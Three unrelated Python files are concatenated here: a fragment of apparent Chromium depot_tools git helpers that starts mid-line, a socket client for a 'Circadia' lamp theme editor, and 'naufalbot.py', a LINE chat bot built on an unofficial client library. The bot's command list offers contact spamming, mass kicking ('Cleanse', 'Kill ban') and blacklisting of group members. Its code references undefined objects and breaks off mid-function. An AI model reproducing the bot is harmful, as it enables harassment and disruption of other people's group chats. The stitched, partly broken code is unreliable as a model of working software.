'|'.join(FREEZE_SECTIONS))) # NOTE: This list is DEPRECATED in favor of the Infra Git wrapper: # https://chromium.googlesource.com/infra/infra/+/master/go/src/infra/tools/git # # New entries should be added to the Git wrapper, NOT to this list. "git_retry" # is, similarly, being deprecated in favor of the Git wrapper. # # --- # # Retry a git operation if git returns a error response with any of these # messages. It's all observed 'bad' GoB responses so far. # # This list is inspired/derived from the one in ChromiumOS's Chromite: # <CHROMITE>/lib/git.py::GIT_TRANSIENT_ERRORS # # It was last imported from '7add3ac29564d98ac35ce426bc295e743e7c0c02'. GIT_TRANSIENT_ERRORS = ( # crbug.com/285832 r'!.*\[remote rejected\].*\(error in hook\)', # crbug.com/289932 r'!.*\[remote rejected\].*\(failed to lock\)', # crbug.com/307156 r'!.*\[remote rejected\].*\(error in Gerrit backend\)', # crbug.com/285832 r'remote error: Internal Server Error', # crbug.com/294449 r'fatal: Couldn\'t find remote ref ', # crbug.com/220543 r'git fetch_pack: expected ACK/NAK, got', # crbug.com/189455 r'protocol error: bad pack header', # crbug.com/202807 r'The remote end hung up unexpectedly', # crbug.com/298189 r'TLS packet with unexpected length was received', # crbug.com/187444 r'RPC failed; result=\d+, HTTP code = \d+', # crbug.com/388876 r'Connection timed out', # crbug.com/430343 # TODO(dnj): Resync with Chromite. r'The requested URL returned error: 5\d+', r'Connection reset by peer', r'Unable to look up', r'Couldn\'t resolve host', ) GIT_TRANSIENT_ERRORS_RE = re.compile('|'.join(GIT_TRANSIENT_ERRORS), re.IGNORECASE) # git's for-each-ref command first supported the upstream:track token in its # format string in version 1.9.0, but some usages were broken until 2.3.0. # See git commit b6160d95 for more information. 
MIN_UPSTREAM_TRACK_GIT_VERSION = (2, 3) class BadCommitRefException(Exception): def __init__(self, refs): msg = ('one of %s does not seem to be a valid commitref.' % str(refs)) super(BadCommitRefException, self).__init__(msg) def memoize_one(**kwargs): """Memoizes a single-argument pure function. Values of None are not cached. Kwargs: threadsafe (bool) - REQUIRED. Specifies whether to use locking around cache manipulation functions. This is a kwarg so that users of memoize_one are forced to explicitly and verbosely pick True or False. Adds three methods to the decorated function: * get(key, default=None) - Gets the value for this key from the cache. * set(key, value) - Sets the value for this key from the cache. * clear() - Drops the entire contents of the cache. Useful for unittests. * update(other) - Updates the contents of the cache from another dict. """ assert 'threadsafe' in kwargs, 'Must specify threadsafe={True,False}' threadsafe = kwargs['threadsafe'] if threadsafe: def withlock(lock, f): def inner(*args, **kwargs): with lock: return f(*args, **kwargs) return inner else: def withlock(_lock, f): return f def decorator(f): # Instantiate the lock in decorator, in case users of memoize_one do: # # memoizer = memoize_one(threadsafe=True) # # @memoizer # def fn1(val): ... # # @memoizer # def fn2(val): ... lock = threading.Lock() if threadsafe else None cache = {} _get = withlock(lock, cache.get) _set = withlock(lock, cache.__setitem__) @functools.wraps(f) def inner(arg): ret = _get(arg) if ret is None: ret = f(arg) if ret is not None: _set(arg, ret) return ret inner.get = _get inner.set = _set inner.clear = withlock(lock, cache.clear) inner.update = withlock(lock, cache.update) return inner return decorator def _ScopedPool_initer(orig, orig_args): # pragma: no cover """Initializer method for ScopedPool's subprocesses. This helps ScopedPool handle Ctrl-C's correctly. """ signal.signal(signal.SIGINT, signal.SIG_IGN) if orig: orig(*orig_args) @contextlib.contextmanager def ScopedPool(*args, **kwargs): """Context Manager which returns a multiprocessing.pool instance which correctly deals with thrown exceptions. *args - Arguments to multiprocessing.pool Kwargs: kind ('threads', 'procs') - The type of underlying coprocess to use. **etc - Arguments to multiprocessing.pool """ if kwargs.pop('kind', None) == 'threads': pool = multiprocessing.pool.ThreadPool(*args, **kwargs) else: orig, orig_args = kwargs.get('initializer'), kwargs.get('initargs', ()) kwargs['initializer'] = _ScopedPool_initer kwargs['initargs'] = orig, orig_args pool = multiprocessing.pool.Pool(*args, **kwargs) try: yield pool pool.close() except: pool.terminate() raise finally: pool.join() class ProgressPrinter(object): """Threaded single-stat status message printer.""" def __init__(self, fmt, enabled=None, fout=sys.stderr, period=0.5): """Create a ProgressPrinter. Use it as a context manager which produces a simple 'increment' method: with ProgressPrinter('(%%(count)d/%d)' % 1000) as inc: for i in xrange(1000): # do stuff if i % 10 == 0: inc(10) Args: fmt - String format with a single '%(count)d' where the counter value should go. enabled (bool) - If this is None, will default to True if logging.getLogger() is set to INFO or more verbose. fout (file-like) - The stream to print status messages to. period (float) - The time in seconds for the printer thread to wait between printing. 
""" self.fmt = fmt if enabled is None: # pragma: no cover self.enabled = logging.getLogger().isEnabledFor(logging.INFO) else: self.enabled = enabled self._count = 0 self._dead = False self._dead_cond = threading.Condition() self._stream = fout self._thread = threading.Thread(target=self._run) self._period = period def _emit(self, s): if self.enabled: self._stream.write('\r' + s) self._stream.flush() def _run(self): with self._dead_cond: while not self._dead: self._emit(self.fmt % {'count': self._count}) self._dead_cond.wait(self._period) self._emit((self.fmt + '\n') % {'count': self._count}) def inc(self, amount=1): self._count += amount def __enter__(self): self._thread.start() return self.inc def __exit__(self, _exc_type, _exc_value, _traceback): self._dead = True with self._dead_cond: self._dead_cond.notifyAll() self._thread.join() del self._thread def once(function): """@Decorates |function| so that it only performs its action once, no matter how many times the decorated |function| is called.""" has_run = [False] def _wrapper(*args, **kwargs): if not has_run[0]: has_run[0] = True function(*args, **kwargs) return _wrapper def unicode_repr(s): result = repr(s) return result[1:] if result.startswith('u') else result ## Git functions def die(message, *args): print(textwrap.dedent(message % args), file=sys.stderr) sys.exit(1) def blame(filename, revision=None, porcelain=False, abbrev=None, *_args): command = ['blame'] if porcelain: command.append('-p') if revision is not None: command.append(revision) if abbrev is not None: command.append('--abbrev=%d' % abbrev) command.extend(['--', filename]) return run(*command) def branch_config(branch, option, default=None): return get_config('branch.%s.%s' % (branch, option), default=default) def branch_config_map(option): """Return {branch: <|option| value>} for all branches.""" try: reg = re.compile(r'^branch\.(.*)\.%s$' % option) lines = get_config_regexp(reg.pattern) return {reg.match(k).group(1): v for k, v in (l.split() for l in lines)} except subprocess2.CalledProcessError: return {} def branches(use_limit=True, *args): NO_BRANCH = ('* (no branch', '* (detached', '* (HEAD detached') key = 'depot-tools.branch-limit' limit = get_config_int(key, 20) raw_branches = run('branch', *args).splitlines() num = len(raw_branches) if use_limit and num > limit: die("""\ Your git repo has too many branches (%d/%d) for this tool to work well. You may adjust this limit by running: git config %s <new_limit> You may also try cleaning up your old branches by running: git cl archive """, num, limit, key) for line in raw_branches: if line.startswith(NO_BRANCH): continue yield line.split()[-1] def get_config(option, default=None): try: return run('config', '--get', option) or default except subprocess2.CalledProcessError: return default def get_config_int(option, default=0): assert isinstance(default, int) try: return int(get_config(option, default)) except ValueError: return default def get_config_list(option): try: return run('config', '--get-all', option).split() except subprocess2.CalledProcessError: return [] def get_config_regexp(pattern): if IS_WIN: # pragma: no cover # this madness is because we call git.bat which calls git.exe which calls # bash.exe (or something to that effect). Each layer divides the number of # ^'s by 2. 
pattern = pattern.replace('^', '^' * 8) return run('config', '--get-regexp', pattern).splitlines() def current_branch(): try: return run('rev-parse', '--abbrev-ref', 'HEAD') except subprocess2.CalledProcessError: return None def del_branch_config(branch, option, scope='local'): del_config('branch.%s.%s' % (branch, option), scope=scope) def del_config(option, scope='local'): try: run('config', '--' + scope, '--unset', option) except subprocess2.CalledProcessError: pass def diff(oldrev, newrev, *args): return run('diff', oldrev, newrev, *args) def freeze(): took_action = False key = 'depot-tools.freeze-size-limit' MB = 2**20 limit_mb = get_config_int(key, 100) untracked_bytes = 0 root_path = repo_root() for f, s in status(): if is_unmerged(s): die("Cannot freeze unmerged changes!") if limit_mb > 0: if s.lstat == '?': untracked_bytes += os.stat(os.path.join(root_path, f)).st_size if limit_mb > 0 and untracked_bytes > limit_mb * MB: die("""\ You appear to have too much untracked+unignored data in your git checkout: %.1f / %d MB. Run `git status` to see what it is. In addition to making many git commands slower, this will prevent depot_tools from freezing your in-progress changes. You should add untracked data that you want to ignore to your repo's .git/info/exclude file. See `git help ignore` for the format of this file. If this data is indended as part of your commit, you may adjust the freeze limit by running: git config %s <new_limit> Where <new_limit> is an integer threshold in megabytes.""", untracked_bytes / (MB * 1.0), limit_mb, key) try: run('commit', '--no-verify', '-m', FREEZE + '.indexed') took_action = True except subprocess2.CalledProcessError: pass add_errors = False try: run('add', '-A', '--ignore-errors') except subprocess2.CalledProcessError: add_errors = True try: run('commit', '--no-verify', '-m', FREEZE + '.unindexed') took_action = True except subprocess2.CalledProcessError: pass ret = [] if add_errors: ret.append('Failed to index some unindexed files.') if not took_action: ret.append('Nothing to freeze.') return ' '.join(ret) or None def get_branch_tree(): """Get the dictionary of {branch: parent}, compatible with topo_iter. Returns a tuple of (skipped, <branch_tree dict>) where skipped is a set of branches without upstream branches defined. """ skipped = set() branch_tree = {} for branch in branches(): parent = upstream(branch) if not parent: skipped.add(branch) continue branch_tree[branch] = parent return skipped, branch_tree def get_or_create_merge_base(branch, parent=None): """Finds the configured merge base for branch. If parent is supplied, it's used instead of calling upstream(branch). 
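
  Example (illustrative; 'feature' is a hypothetical branch name):

    base = get_or_create_merge_base('feature')
    # The first call runs `git merge-base` and caches the result in
    # branch.feature.base / branch.feature.base-upstream; later calls reuse
    # the cached value while it is still valid.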
""" base = branch_config(branch, 'base') base_upstream = branch_config(branch, 'base-upstream') parent = parent or upstream(branch) if parent is None or branch is None: return None actual_merge_base = run('merge-base', parent, branch) if base_upstream != parent: base = None base_upstream = None def is_ancestor(a, b): return run_with_retcode('merge-base', '--is-ancestor', a, b) == 0 if base and base != actual_merge_base: if not is_ancestor(base, branch): logging.debug('Found WRONG pre-set merge-base for %s: %s', branch, base) base = None elif is_ancestor(base, actual_merge_base): logging.debug('Found OLD pre-set merge-base for %s: %s', branch, base) base = None else: logging.debug('Found pre-set merge-base for %s: %s', branch, base) if not base: base = actual_merge_base manual_merge_base(branch, base, parent) return base def hash_multi(*reflike): return run('rev-parse', *reflike).splitlines() def hash_one(reflike, short=False): args = ['rev-parse', reflike] if short: args.insert(1, '--short') return run(*args) def in_rebase(): git_dir = run('rev-parse', '--git-dir') return ( os.path.exists(os.path.join(git_dir, 'rebase-merge')) or os.path.exists(os.path.join(git_dir, 'rebase-apply'))) def intern_f(f, kind='blob'): """Interns a file object into the git object store. Args: f (file-like object) - The file-like object to intern kind (git object type) - One of 'blob', 'commit', 'tree', 'tag'. Returns the git hash of the interned object (hex encoded). """ ret = run('hash-object', '-t', kind, '-w', '--stdin', stdin=f) f.close() return ret def is_dormant(branch): # TODO(iannucci): Do an oldness check? return branch_config(branch, 'dormant', 'false') != 'false' def is_unmerged(stat_value): return ( 'U' in (stat_value.lstat, stat_value.rstat) or ((stat_value.lstat == stat_value.rstat) and stat_value.lstat in 'AD') ) def manual_merge_base(branch, base, parent): set_branch_config(branch, 'base', base) set_branch_config(branch, 'base-upstream', parent) def mktree(treedict): """Makes a git tree object and returns its hash. See |tree()| for the values of mode, type, and ref. Args: treedict - { name: (mode, type, ref) } """ with tempfile.TemporaryFile() as f: for name, (mode, typ, ref) in treedict.items(): f.write(('%s %s %s\t%s\0' % (mode, typ, ref, name)).encode('utf-8')) f.seek(0) return run('mktree', '-z', stdin=f) def parse_commitrefs(*commitrefs): """Returns binary encoded commit hashes for one or more commitrefs. A commitref is anything which can resolve to a commit. Popular examples: * 'HEAD' * 'origin/master' * 'cool_branch~2' """ try: return [binascii.unhexlify(h) for h in hash_multi(*commitrefs)] except subprocess2.CalledProcessError: raise BadCommitRefException(commitrefs) RebaseRet = collections.namedtuple('RebaseRet', 'success stdout stderr') def rebase(parent, start, branch, abort=False): """Rebases |start|..|branch| onto the branch |parent|. Args: parent - The new parent ref for the rebased commits. start - The commit to start from branch - The branch to rebase abort - If True, will call git-rebase --abort in the event that the rebase doesn't complete successfully. Returns a namedtuple with fields: success - a boolean indicating that the rebase command completed successfully. message - if the rebase failed, this contains the stdout of the failed rebase. 
""" try: args = ['--onto', parent, start, branch] if TEST_MODE: args.insert(0, '--committer-date-is-author-date') run('rebase', *args) return RebaseRet(True, '', '') except subprocess2.CalledProcessError as cpe: if abort: run_with_retcode('rebase', '--abort') # ignore failure return RebaseRet(False, cpe.stdout, cpe.stderr) def remove_merge_base(branch): del_branch_config(branch, 'base') del_branch_config(branch, 'base-upstream') def repo_root(): """Returns the absolute path to the repository root.""" return run('rev-parse', '--show-toplevel') def upstream_default(): """Returns the default branch name of the origin repository.""" try: return run('rev-parse', '--abbrev-ref', 'origin/HEAD') except subprocess2.CalledProcessError: return 'origin/master' def root(): return get_config('depot-tools.upstream', upstream_default()) @contextlib.contextmanager def less(): # pragma: no cover """Runs 'less' as context manager yielding its stdin as a PIPE. Automatically checks if sys.stdout is a non-TTY stream. If so, it avoids running less and just yields sys.stdout. The returned PIPE is opened on binary mode. """ if not setup_color.IS_TTY: # On Python 3, sys.stdout doesn't accept bytes, and sys.stdout.buffer must # be used. yield getattr(sys.stdout, 'buffer', sys.stdout) return # Run with the same options that git uses (see setup_pager in git repo). # -F: Automatically quit if the output is less than one screen. # -R: Don't escape ANSI color codes. # -X: Don't clear the screen before starting. cmd = ('less', '-FRX') try: proc = subprocess2.Popen(cmd, stdin=subprocess2.PIPE) yield proc.stdin finally: try: proc.stdin.close() except BrokenPipeError: # BrokenPipeError is raised if proc has already completed, pass proc.wait() def run(*cmd, **kwargs): """The same as run_with_stderr, except it only returns stdout.""" return run_with_stderr(*cmd, **kwargs)[0] def run_with_retcode(*cmd, **kwargs): """Run a command but only return the status code.""" try: run(*cmd, **kwargs) return 0 except subprocess2.CalledProcessError as cpe: return cpe.returncode def run_stream(*cmd, **kwargs): """Runs a git command. Returns stdout as a PIPE (file-like object). stderr is dropped to avoid races if the process outputs to both stdout and stderr. """ kwargs.setdefault('stderr', subprocess2.VOID) kwargs.setdefault('stdout', subprocess2.PIPE) kwargs.setdefault('shell', False) cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd proc = subprocess2.Popen(cmd, **kwargs) return proc.stdout @contextlib.contextmanager def run_stream_with_retcode(*cmd, **kwargs): """Runs a git command as context manager yielding stdout as a PIPE. stderr is dropped to avoid races if the process outputs to both stdout and stderr. Raises subprocess2.CalledProcessError on nonzero return code. """ kwargs.setdefault('stderr', subprocess2.VOID) kwargs.setdefault('stdout', subprocess2.PIPE) kwargs.setdefault('shell', False) cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd try: proc = subprocess2.Popen(cmd, **kwargs) yield proc.stdout finally: retcode = proc.wait() if retcode != 0: raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(), None, None) def run_with_stderr(*cmd, **kwargs): """Runs a git command. Returns (stdout, stderr) as a pair of strings. kwargs autostrip (bool) - Strip the output. Defaults to True. indata (str) - Specifies stdin data for the process. 
""" kwargs.setdefault('stdin', subprocess2.PIPE) kwargs.setdefault('stdout', subprocess2.PIPE) kwargs.setdefault('stderr', subprocess2.PIPE) kwargs.setdefault('shell', False) autostrip = kwargs.pop('autostrip', True) indata = kwargs.pop('indata', None) decode = kwargs.pop('decode', True) cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd proc = subprocess2.Popen(cmd, **kwargs) ret, err = proc.communicate(indata) retcode = proc.wait() if retcode != 0: raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(), ret, err) if autostrip: ret = (ret or b'').strip() err = (err or b'').strip() if decode: ret = ret.decode('utf-8', 'replace') err = err.decode('utf-8', 'replace') return ret, err def set_branch_config(branch, option, value, scope='local'): set_config('branch.%s.%s' % (branch, option), value, scope=scope) def set_config(option, value, scope='local'): run('config', '--' + scope, option, value) def get_dirty_files(): # Make sure index is up-to-date before running diff-index. run_with_retcode('update-index', '--refresh', '-q') return run('diff-index', '--ignore-submodules', '--name-status', 'HEAD') def is_dirty_git_tree(cmd): w = lambda s: sys.stderr.write(s+"\n") dirty = get_dirty_files() if dirty: w('Cannot %s with a dirty tree. Commit, freeze or stash your changes first.' % cmd) w('Uncommitted files: (git diff-index --name-status HEAD)') w(dirty[:4096]) if len(dirty) > 4096: # pragma: no cover w('... (run "git diff-index --name-status HEAD" to see full output).') return True return False def status(): """Returns a parsed version of git-status. Returns a generator of (current_name, (lstat, rstat, src)) pairs where: * current_name is the name of the file * lstat is the left status code letter from git-status * rstat is the left status code letter from git-status * src is the current name of the file, or the original name of the file if lstat == 'R' """ stat_entry = collections.namedtuple('stat_entry', 'lstat rstat src') def tokenizer(stream): acc = BytesIO() c = None while c != b'': c = stream.read(1) if c in (None, b'', b'\0'): if len(acc.getvalue()): yield acc.getvalue() acc = BytesIO() else: acc.write(c) def parser(tokens): while True: try: status_dest = next(tokens).decode('utf-8') except StopIteration: return stat, dest = status_dest[:2], status_dest[3:] lstat, rstat = stat if lstat == 'R': src = next(tokens).decode('utf-8') else: src = dest yield (dest, stat_entry(lstat, rstat, src)) return parser(tokenizer(run_stream('status', '-z', bufsize=-1))) def squash_current_branch(header=None, merge_base=None): header = header or 'git squash commit for %s.' % current_branch() merge_base = merge_base or get_or_create_merge_base(current_branch()) log_msg = header + '\n' if log_msg: log_msg += '\n' log_msg += run('log', '--reverse', '--format=%H%n%B', '%s..HEAD' % merge_base) run('reset', '--soft', merge_base) if not get_dirty_files(): # Sometimes the squash can result in the same tree, meaning that there is # nothing to commit at this point. print('Nothing to commit; squashed branch is empty') return False run('commit', '--no-verify', '-a', '-F', '-', indata=log_msg.encode('utf-8')) return True def tags(*args): return run('tag', *args).splitlines() def thaw(): took_action = False for sha in run_stream('rev-list', 'HEAD').readlines(): sha = sha.strip().decode('utf-8') msg = run('show', '--format=%f%b', '-s', 'HEAD') match = FREEZE_MATCHER.match(msg) if not match: if not took_action: return 'Nothing to thaw.' 
break run('reset', '--' + FREEZE_SECTIONS[match.group(1)], sha) took_action = True def topo_iter(branch_tree, top_down=True): """Generates (branch, parent) in topographical order for a branch tree. Given a tree: A1 B1 B2 C1 C2 C3 D1 branch_tree would look like: { 'D1': 'C3', 'C3': 'B2', 'B2': 'A1', 'C1': 'B1', 'C2': 'B1', 'B1': 'A1', } It is OK to have multiple 'root' nodes in your graph. if top_down is True, items are yielded from A->D. Otherwise they're yielded from D->A. Within a layer the branches will be yielded in sorted order. """ branch_tree = branch_tree.copy() # TODO(iannucci): There is probably a more efficient way to do these. if top_down: while branch_tree: this_pass = [(b, p) for b, p in branch_tree.items() if p not in branch_tree] assert this_pass, "Branch tree has cycles: %r" % branch_tree for branch, parent in sorted(this_pass): yield branch, parent del branch_tree[branch] else: parent_to_branches = collections.defaultdict(set) for branch, parent in branch_tree.items(): parent_to_branches[parent].add(branch) while branch_tree: this_pass = [(b, p) for b, p in branch_tree.items() if not parent_to_branches[b]] assert this_pass, "Branch tree has cycles: %r" % branch_tree for branch, parent in sorted(this_pass): yield branch, parent parent_to_branches[parent].discard(branch) del branch_tree[branch] def tree(treeref, recurse=False): """Returns a dict representation of a git tree object. Args: treeref (str) - a git ref which resolves to a tree (commits count as trees). recurse (bool) - include all of the tree's descendants too. File names will take the form of 'some/path/to/file'. Return format: { 'file_name': (mode, type, ref) } mode is an integer where: * 0040000 - Directory * 0100644 - Regular non-executable file * 0100664 - Regular non-executable group-writeable file * 0100755 - Regular executable file * 0120000 - Symbolic link * 0160000 - Gitlink type is a string where it's one of 'blob', 'commit', 'tree', 'tag'. ref is the hex encoded hash of the entry. """ ret = {} opts = ['ls-tree', '--full-tree'] if recurse: opts.append('-r') opts.append(treeref) try: for line in run(*opts).splitlines(): mode, typ, ref, name = line.split(None, 3) ret[name] = (mode, typ, ref) except subprocess2.CalledProcessError: return None return ret def get_remote_url(remote='origin'): try: return run('config', 'remote.%s.url' % remote) except subprocess2.CalledProcessError: return None def upstream(branch): try: return run('rev-parse', '--abbrev-ref', '--symbolic-full-name', branch+'@{upstream}') except subprocess2.CalledProcessError: return None def get_git_version(): """Returns a tuple that contains the numeric components of the current git version.""" version_string = run('--version') version_match = re.search(r'(\d+.)+(\d+)', version_string) version = version_match.group() if version_match else '' return tuple(int(x) for x in version.split('.')) def get_branches_info(include_tracking_status): format_string = ( '--format=%(refname:short):%(objectname:short):%(upstream:short):') # This is not covered by the depot_tools CQ which only has git version 1.8. 
if (include_tracking_status and get_git_version() >= MIN_UPSTREAM_TRACK_GIT_VERSION): # pragma: no cover format_string += '%(upstream:track)' info_map = {} data = run('for-each-ref', format_string, 'refs/heads') BranchesInfo = collections.namedtuple( 'BranchesInfo', 'hash upstream ahead behind') for line in data.splitlines(): (branch, branch_hash, upstream_branch, tracking_status) = line.split(':') ahead_match = re.search(r'ahead (\d+)', tracking_status) ahead = int(ahead_match.group(1)) if ahead_match else None behind_match = re.search(r'behind (\d+)', tracking_status) behind = int(behind_match.group(1)) if behind_match else None info_map[branch] = BranchesInfo( hash=branch_hash, upstream=upstream_branch, ahead=ahead, behind=behind) # Set None for upstreams which are not branches (e.g empty upstream, remotes # and deleted upstream branches). missing_upstreams = {} for info in info_map.values(): if info.upstream not in info_map and info.upstream not in missing_upstreams: missing_upstreams[info.upstream] = None result = info_map.copy() result.update(missing_upstreams) return result def make_workdir_common(repository, new_workdir, files_to_symlink, files_to_copy, symlink=None): if not symlink: symlink = os.symlink os.makedirs(new_workdir) for entry in files_to_symlink: clone_file(repository, new_workdir, entry, symlink) for entry in files_to_copy: clone_file(repository, new_workdir, entry, shutil.copy) def make_workdir(repository, new_workdir): GIT_DIRECTORY_WHITELIST = [ 'config', 'info', 'hooks', 'logs/refs', 'objects', 'packed-refs', 'refs', 'remotes', 'rr-cache', ] make_workdir_common(repository, new_workdir, GIT_DIRECTORY_WHITELIST, ['HEAD']) def clone_file(repository, new_workdir, link, operation): if not os.path.exists(os.path.join(repository, link)): return link_dir = os.path.dirname(os.path.join(new_workdir, link)) if not os.path.exists(link_dir): os.makedirs(link_dir) src = os.path.join(repository, link) if os.path.islink(src): src = os.path.realpath(src) operation(src, os.path.join(new_workdir, link))
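
# --- Illustrative usage sketch (not part of the original module) -------------
# A minimal example of how the helpers above compose: get_branch_tree() builds
# the {branch: parent} mapping and topo_iter() walks it parents-first. It
# assumes it is run from inside a git checkout; the branch names it prints are
# whatever the local repository happens to contain.

def _example_print_branch_tree():
  cur = current_branch()
  skipped, tree_map = get_branch_tree()
  for branch in sorted(skipped):
    print('  %s (no upstream configured)' % branch)
  for branch, parent in topo_iter(tree_map):
    marker = '*' if branch == cur else ' '
    print('%s %s -> %s' % (marker, branch, parent))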
SClient.py
""" Circadia Theme Editor - socket client communicates with a remote server over sockets Author: fhu """ import threading import socket import json import pygame # # todo: implement remote sound. sound is currently played back locally # class CircadiaSocketClient: def __init__(self): self.addr = "0.0.0.0" self.port = 0 self.worker = None self.starttime = 0 self.success = 0 self.canvasW = 16 self.canvasH = 18 self.sounds = dict() pygame.mixer.pre_init(frequency=41000) pygame.init() def __del__(self): self.disconnect() def connect(self, addr, port): """ connect to the lamp, non blocking :param addr: ip address, string :param port: port, int :return: """ if self.isBusy(): return false self.addr = addr self.port = port self.success = 0 # send a greeting self.__sendMsg("hello") def disconnect(self): if self.isConnected(): self.__sendMsg('reset') def isConnected(self): """ find out if the lamp is talking :return: lamp is connected, bool """ if not self.isBusy(): return self.success > 0 else: return False def isBusy(self): """ find out if a transmission is in progress :return: """ if not self.worker: return False if self.worker[0].isAlive(): return True if self.worker[2] == "ok": self.success += 1 elif self.worker[2][:3] == "cfg": tok = self.worker[2].split(':') self.canvasW = int(tok[1]) self.canvasH = int(tok[2]) self.success += 1 print 'received dim', self.canvasW, self.canvasH else: self.success = 0 print self.worker[2] self.worker = None def startSoundLoop(self, hash, filename, volume): print 'starting', filename, 'on', hash # (filename, soundobject) if hash in self.sounds: soundRecord = self.sounds[hash] playing = soundRecord[1].get_num_channels() > 0 if soundRecord[0] != filename: if playing: soundRecord[1].fadeout(800) soundRecord[0] = filename soundRecord[1] = pygame.mixer.Sound(filename) soundRecord[1].play(loops=-1) soundRecord[1].set_volume(volume) else: soundRecord[1].play(loops=-1) soundRecord[1].set_volume(volume) else: self.sounds[hash] = [0, 0, 0] soundRecord = self.sounds[hash] soundRecord[0] = filename soundRecord[1] = pygame.mixer.Sound(filename) soundRecord[1].play(loops=-1) soundRecord[1].set_volume(volume) def stopSoundLoop(self, hash): print 'stopping', hash if hash in self.sounds: self.sounds[hash][1].fadeout(800) def setSoundVolume(self, hash, volume): if hash in self.sounds: self.sounds[hash][1].set_volume(volume) def sendGradient(self, grad): """ :param grad: list of 18 colors [ [r0,g0,b0], [r1,g1,b1], ...] :return: busy state """ buff = json.dumps(grad) return self.__sendMsg('grad:'+buff) def sendCanvas(self, canvas): """ :param canvas: list of 18*16 colors [ r0,g0,b0, r1,g1,b1, ...] 
:return: busy state """ buff = json.dumps(canvas) return self.__sendMsg('cnv:'+buff) def __sendMsg(self, msg): if self.isBusy(): return False job = ['thread', msg, None] t = threading.Thread(target=self.__dispatch, args=(self.addr, self.port, job)) job[0] = t t.start() self.worker = job return True @staticmethod def __dispatch(addr, port, msg): """ worker :param addr: :param port: :param msg: list (thread obj, message, return value) :return: """ print 'opening socket' clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) clientsocket.settimeout(2) try: clientsocket.connect((addr, port)) except: msg[2] = "couldn't connect to socket" return print 'sending' n = clientsocket.sendall(msg[1]) clientsocket.shutdown(socket.SHUT_WR) print 'sent', n buffer = "" while(1): buf = clientsocket.recv(1024) if len(buf) > 0: buffer += buf else: print 'received %d bytes'%len(buffer) msg[2] = buffer break clientsocket.close() print 'done' __author__ = 'fhu'
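
# --- Illustrative usage sketch (not part of the original module) -------------
# A minimal example of driving CircadiaSocketClient. All calls are non-blocking,
# so isBusy() is polled between requests. The lamp address, port and the solid
# red gradient below are made-up example values.

if __name__ == '__main__':
    import time

    client = CircadiaSocketClient()
    client.connect('192.168.1.50', 9000)     # hypothetical lamp address/port
    while client.isBusy():                    # wait for the greeting round-trip
        time.sleep(0.1)

    if client.isConnected():
        # the 'cfg' reply updates canvasW/canvasH; send one colour per row
        red = [[255, 0, 0]] * client.canvasH
        client.sendGradient(red)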
naufalbot.py
# -*- coding: utf-8 -*- import LINETCR from LINETCR.lib.curve.ttypes import * from datetime import datetime import time,random,sys,json,codecs,threading,glob,re cl = LINETCR.LINE() cl.login(qr=True) cl.loginResult() print "login success" reload(sys) sys.setdefaultencoding('utf-8') helpMessage =""" Naufal Bot ¤ Id︎ ¤ Mid ¤ Me︎ ¤ TL︎:「Text」 ¤ Mc 「mid」 ¤ K on/off ¤ Join︎ on/off ¤ Gcancel:︎「Number of people」 ¤ Group cancelalll︎ ¤ Leave︎ on/off ¤ Add on/off ¤ Share on/off ¤ Message change:「text」 ¤ Message check ¤ Confirm ¤ Jam on/off ¤ Change clientock:「name」 ¤ Up ¤ Cv join ¤ Command in the groups ¤ ¤ Urloff ¤ Urlon ¤ url ¤ url:「Group ID」 ¤ Invite:「mid」 ¤ Kick:「mid」 ¤ Ginfo ¤ Cancel ¤ Gn 「group name」 ¤ Nk 「name」 ¤ Tag all ¤ Mid @ ¤ Bye @ ¤ Pembuat bot ¤ Spamcontact @ ¤ Cleanse ¤ List group ¤ Group bc ¤ Setlastpoint ¤ Viewlastseen ¤ winvite : [Kontak] ¤ Command kicker only ¤ ¤ Bye ¤ Kill ban ¤ Kill @「Tag」 ¤ Ban @「Tag」 ¤ Unban @「Tag」 ¤ Ban︎ [Share Contact] ¤ Unban︎ [Share Contact] ¤ Banlist︎ ¤ Cek ban ¤ mid ¤ invite:「mid」 ¤ rename:「name」 ¤ gift ¤ Respo︎n ¤ Bot cancel ¤ Title: ¤ Gua Mau Masuk Team Kamu """ KAC=[cl] mid = cl.getProfile().mid Bots=[mid] admin=["uc8e2c2b906e2322592c6d8f91a0957f7"] wait = { 'contact':False, 'autoJoin':True, 'autoCancel':{"on":True,"members":1}, 'leaveRoom':True, 'timeline':True, 'autoAdd':True, 'message':"Owner. ID Line : naufal_opalminecraft", "lang":"JP", "comment":"Owner. ID Line : NaufalOpalMinecraft", "commentOn":True, "commentBlack":{}, "wblack":False, "dblack":False, "clock":False, "blacklist":{}, "wblacklist":False, "dblacklist":False, "protectionOn":True, "atjointicket":True } wait2 = { 'readPoint':{}, 'readMember':{}, 'setTime':{}, 'ROM':{} } setTime = {} setTime = wait2['setTime'] def sendMessage(to, text, contentMetadata={}, contentType=0): mes = Message() mes.to, mes.from_ = to, profile.mid mes.text = text mes.contentType, mes.contentMetadata = contentType, contentMetadata if to not in messageReq: messageReq[to] = -1 messageReq[to] += 1 def NOTIFIED_READ_MESSAGE(op): try: if op.param1 in wait2['readPoint']: Name = cl.getContact(op.param2).displayName if Name in wait2['readMember'][op.param1]: pass else: wait2['readMember'][op.param1] += "\n・" + Name wait2['ROM'][op.param1][op.param2] = "・" + Name else: pass except: pass def bot(op): try: if op.type == 0: return if op.type == 5: if wait["autoAdd"] == True: cl.findAndAddContactsByMid(op.param1) if (wait["message"] in [""," ","\n",None]): pass else: cl.sendText(op.param1,str(wait["message"])) #------Open QR Kick start------# if op.type == 10: if wait["ProtectQR"] == True: if op.param2 not in Bots: G = cl.getGroup(op.param1) G = ki.getGroup(op.param1) G.preventJoinByTicket = True ki.kickoutFromGroup(op.param1,[op.param2]) cl.updateGroup(G) #------Open QR Kick finish-----# #------Invite User Kick start------# if op.type == 13: if wait["Protectguest"] == True: if op.param2 not in Bots: random.choice(KAC).cancelGroupInvitation(op.param1,[op.param3]) random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) #------Invite User Kick Finish------# if op.type == 17: if op.param2 not in Bots: joinblacklist = op.param2.replace("¡¤",',') joinblacklistX = joinblacklist.split(",") matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, joinblacklistX) if matched_list == []: pass else: 